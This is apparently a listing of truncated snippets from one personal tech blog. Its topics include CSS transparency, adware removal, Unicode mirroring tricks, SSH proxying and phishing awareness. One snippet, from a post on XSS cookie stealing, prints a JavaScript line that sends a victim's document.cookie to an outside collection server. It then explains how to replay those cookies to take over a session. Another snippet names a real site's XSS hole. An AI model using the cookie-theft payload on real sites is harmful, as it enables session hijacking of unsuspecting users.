http://digitalpbk.blogspot.com/2007/06/css-transparency-effects.html
CSS Transparency Effects
10% 20% 30% 40% 50% 60% 70% 80% 90% 100% IntroCSS (Cascading Style Sheets) can be used to add cool effects to an ordinary looking web page. One such example is adding transparency effect to images or other portions including text of your website. in IEIn IE transparency is achieved by filter: alpha(opacity=XXX) where XXX takes value from 0 to 100. It indicates the % of opacity required.For example produces a semi transparent google logo.in
FirefoxIn
firefox the same ...
Published 4 years, 8 months ago
http://digitalpbk.blogspot.com/2007/01/xss-on-grazeitcom.html
XSS on GrazeIt.com
Recently while grazing over the net, I found this site grazeit.com. This is a site which keeps a database of good websites found on the net by netizens. But there is an XSS hole (Cross site scripting ) on the site which allow users to redirect the page to any desired location.Of course this hack does not work on the secure browser Mozilla
Firefox. If you are not using
Firefox, download for free (The link is given bottom right).Probably you arrived at this page from grazeit ...
Published 5 years ago
http://digitalpbk.blogspot.com/2008/05/8298235210-malwareadware-vundo.html
Win32.Vundo adware manual removal
IntroThis is yet another adware that spies your computer and should be removed!The AOL Active Virus Shield license has expired and sadly AOL isn't continuing the service. So its left to me to defend my sys against the world of viruses trojans and adwares or in short all other malwares.Win32.Vundo as experts call it,SymptomsOften get popupsMicrosoft Internet Explorer: Work Offline , Cancel window even when not browsingStrange tabs on
Firefox ...
Published 3 years, 9 months ago
http://digitalpbk.blogspot.com/2006/11/fun-with-unicode-and-mirroring.html
. One thing to note that is the mirroring character is not rendered on all browsers. It is supported on
Firefox, Opera, IE7 (partially). If anyone has any info about other browsers please leave a comment. Effect of using a mirroring character on orkut with the profile name is shown below:Note that the word "scrapbook" is inversed. There is more of it left for you to explore and find out ...Mirroring character also works on some Instant Messengers like Google Talk and Yahoo! Messenger ...
Published 5 years, 2 months ago
http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html
();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in
firefox with the cookie editor plugin.Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).Defacing a websiteTo deface a website , the site must have a system which puts something you submit on their site (like ...
Published 5 years, 1 month ago
http://digitalpbk.blogspot.com/2009/05/ssh-proxy-windows-linux-orkut-bypass.html
. Next we have to configure the Browser to use this proxy. On Linux (Or Cygwin on Windows)Run the commandssh -C2qTnN -D 9090 username@remote_machine.comSetting up the Browser
FirefoxOn linux take Edit > PreferencesOn Windows take Tools > OptionsClick on Advanced > Network Tab > Settings. (Illustrated Above)Now you get a window as shown below, and fill the settings as shown below.Manual Proxy SettingsBlank out all other Text FieldsSocks Host: localhostPort : 9090 (or the one you specified ...
Published 2 years, 8 months ago
http://digitalpbk.blogspot.com/2007/01/making-any-window-transparent-on-xp.html
Making any Window Transparent on XP
IntroThis little piece of code written in VB6 allows you to make any window transparent. Make
Firefox, Opera, Internet Explorer, Windows Media Player, Google Talk, Yahoo Messenger, Windows Explorer, basically any window, transparent on Windows XP.*Transparent OperaDownload+Zipped binary for Windows XP from here Transp.ZIP [5 KB]+Source code from planet-source-codeUsageRun the ProgramPlace the mouse over the title bar of the window which you want to make ...
Published 5 years ago
http://digitalpbk.blogspot.com/2007/01/get-smart-against-phishing.html
you.Latest browsers like
Firefox 2, Opera 9 and IE 7 also report about phishing when you are about to visit a phishing site. So upgrade your browser today.A new technique that may not be yet known is the use of mirroring character to reverse the link, so that it appears legitimate.But in this technique to the original link appears in the status bar or copy the link location and pasting shows you the original target url.For webmasters and server administratorsMost spams and phishing scams originate ...
Published 5 years, 1 month ago